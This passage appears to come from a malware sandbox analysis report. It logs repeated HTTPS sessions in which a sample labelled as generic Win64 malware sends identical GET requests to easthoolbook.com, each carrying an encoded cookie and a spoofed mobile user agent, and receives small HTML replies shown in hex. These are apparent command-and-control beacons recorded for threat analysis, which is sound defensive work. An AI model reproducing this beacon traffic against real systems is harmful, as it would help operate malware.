                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:18 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:37 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:18 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.64971489.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:21 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:21 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:39 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:21 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.64971589.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:24 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:24 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:42 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:24 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.64971689.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:27 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:27 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:45 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:27 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.64971789.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:30 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:30 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:48 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:30 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.64971889.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:34 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:34 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:53 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:34 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.64971989.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:37 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:37 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:56 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:37 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.64972089.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:40 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:40 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:28:59 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:40 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.64972189.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:43 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:43 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:02 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:43 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.64972289.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:46 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:46 UTC141INHTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:05 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:31:46 UTC600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 37 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 27 69 65 20 69 65 38 27 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 55 53 27 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 20 20 20 20 3c 68 65 61 64 3e 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 20 2f 3e 20 20 20 20 20 20 20 20 3c
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.64972389.150.57.464436516C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-19 13:31:49 UTC517OUTGET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:31:49 UTC141INHTTP/1.1 200 OK
